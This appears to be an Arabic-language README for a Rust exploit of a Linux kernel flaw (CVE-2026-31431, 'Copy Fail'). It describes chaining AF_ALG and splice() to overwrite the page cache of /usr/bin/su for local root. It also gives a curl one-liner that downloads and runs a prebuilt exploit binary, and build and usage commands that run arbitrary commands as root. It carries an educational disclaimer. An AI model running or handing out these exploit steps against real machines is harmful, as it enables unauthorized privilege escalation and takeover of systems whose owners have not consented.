
نسخ استغلال الفشل (CVE-2026-31431) ولكن بلغة Rust.
استغلال Copy Fail (CVE-2026-31431) ولكن بلغة Rust، وهي ثغرة حرجة تربط بين AF_ALG و splice() لتحقيق كتابة بحجم 4 بايت في ذاكرة التخزين المؤقت للصفحات، مما يؤدي إلى تصعيد الامتيازات محليًا على توزيعات Linux الرئيسية.
استنادًا إلى البحث وPoC من Xint Code.
[!CAUTION] هذا المشروع لأغراض تعليمية وبحثية فقط. تشغيل هذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي. استخدم هذا الكود بمسؤولية لفهم والدفاع ضد الثغرات المماثلة.
AF_ALG و splice() عبر libc.يمكنك تنزيل وتشغيل ثنائي PoC المُجمّع مسبقًا مباشرة:
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs
/usr/bin/su).استنسخ المستودع وقم ببناء الثنائي:
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release
شغّل الاستغلال بدون وسائط للافتراضي إلى /bin/sh:
./target/release/copyfail-rs
أو حدد أمرًا مخصصًا لتشغيله كجذر:
./target/release/copyfail-rs "whoami > /tmp/pwned"
يستغل هذا الاستغلال خطأً في تنفيذ authencesn داخل واجهة Crypto API في نواة Linux (AF_ALG). من خلال ربط sendmsg مع MSG_MORE و splice()، يمكن الكتابة فوق أجزاء صغيرة من ذاكرة التخزين المؤقت للصفحات لملفات عشوائية (مثل /usr/bin/su) بحمولة ELF خبيثة.
AF_ALG وربطه بـ authencesn(hmac(sha256),cbc(aes)).AF_ALG.